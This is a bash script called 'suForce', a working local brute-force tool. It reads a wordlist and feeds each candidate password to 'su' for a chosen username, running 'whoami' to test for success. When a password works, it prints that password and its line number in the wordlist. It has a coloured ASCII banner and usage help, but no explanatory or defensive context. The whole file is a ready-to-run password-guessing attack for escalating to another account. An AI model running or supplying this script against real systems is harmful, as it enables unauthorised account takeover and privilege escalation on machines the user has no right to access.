#!/bin/bash

declare -r RED="\e[91m"
declare -r GREEN="\e[92m"
declare -r YELLOW="\e[93m"
declare -r BLUE="\e[94m"
declare -r WHITE="\e[97m"
declare -r END="\e[0m"

declare -r VAR1='['
declare -r VAR2=']'
declare -r VAR3='i'
declare -r VAR4='*'
declare -r VAR5='>'
declare -r VAR6='<'
declare -r VAR7='-'
declare -r VAR8='+'
declare -r VAR9='./suForce'
declare -r VAR10='WORDLIST'
declare -r VAR11='USER'
declare -r VAR12='Use:'
declare -r VAR13='Username:'
declare -r VAR14='Wordlist:'
declare -r VAR15='Password:'
declare -r VAR16='Line:'
declare -r VAR17='Status'
declare -r VAR18='Fuck!'
declare -r VAR19='it was not possible to decrypt the password.'
declare -r VAR20='-=================================-'

declare -r BOX1="$WHITE$VAR1$GREEN$VAR8$WHITE$VAR2$END"
declare -r BOX2="$WHITE$VAR1$RED$VAR7$WHITE$VAR2$END"
declare -r BOX3="$WHITE$VAR1$YELLOW$VAR3$WHITE$VAR2$END"
declare -r BOX4="$WHITE$VAR1$BLUE$VAR4$WHITE$VAR2$END"

trap ctrl_c INT

function banner(){
  echo -e "$GREEN            _____                        $END"
  echo -e "$RED ___ _   _ $GREEN|  ___|__  _ __ ___ ___   $END"
  echo -e "$RED/ __| | | |$GREEN| |_ / _ \| '__/ __/ _ \\ $END"
  echo -e "$RED\__ \ |_| |$GREEN|  _| (_) | | | (_|  __/  $END"
  echo -e "$RED|___/\__,_|$GREEN|_|  \___/|_|  \___\___|  $END"
  echo -e "$WHITE$VAR20                                   $END"
}

function help(){
  echo ""
  echo -e "$BOX3 $RED$VAR12 $WHITE$VAR9 -u $RED$VAR6$WHITE$VAR11$RED$VAR5$WHITE -w $RED$VAR6$WHITE$VAR10$RED$VAR5$END"
  echo ""
}

function info(){
  echo -e "$BOX4 $WHITE$VAR13 $BLUE$USERNAME$END"
  sleep 1
  echo -e "$BOX4 $WHITE$VAR14 $BLUE$WORDLIST$END"
  sleep 1
  echo -e "$BOX3 $WHITE$VAR17$END"
  sleep 1
}

function ctrl_c(){
  echo ""
  exit 1
}

while getopts ":u:w:" arg; do
  case $arg in
    u) USERNAME=$OPTARG; let parameter_counter+=1 ;;
    w) WORDLIST=$OPTARG; let parameter_counter+=1 ;;
  esac
done

if [ ! -z $WORDLIST ]; then
  banner
  sleep 1
else
  banner
  help
  exit 0
fi

if [ ! -z $USERNAME ]; then
  info
else
  help
  exit 0
fi

LINES=$(wc -l $WORDLIST)
REGEX="([0-9]+).$WORDLIST"
[[ $LINES =~ $REGEX ]]
SIZ="${BASH_REMATCH[1]}"

while read PASSWORD; do
    LINE=$((LINE + 1))
    PROGRESS=$((LINE * 100 / SIZ))
    echo -ne "\r$YELLOW    $LINE/$SIZ/$PROGRESS%/$PASSWORD                              $END"
    echo "$PASSWORD" | timeout 0.5 bash -c "su $USERNAME -c whoami &>/dev/null"
  if [ $? -eq 0 ]; then
    F1=$(/usr/bin/cat $WORDLIST | grep "^$PASSWORD$" -n | cut -d ":" -f 1)
    echo -e "\n$BOX1 $RED$VAR15 $GREEN$PASSWORD$RED $VAR16 $GREEN$F1"
    echo -e "$WHITE$VAR20$END"
    echo ""
    sleep 2
    exit 0
  fi
done < $WORDLIST
echo -e "\r$BOX2 $RED$VAR18 $WHITE$VAR19$END"
echo -e "$WHITE$VAR20$END"
echo ""
sleep 2
exit 0
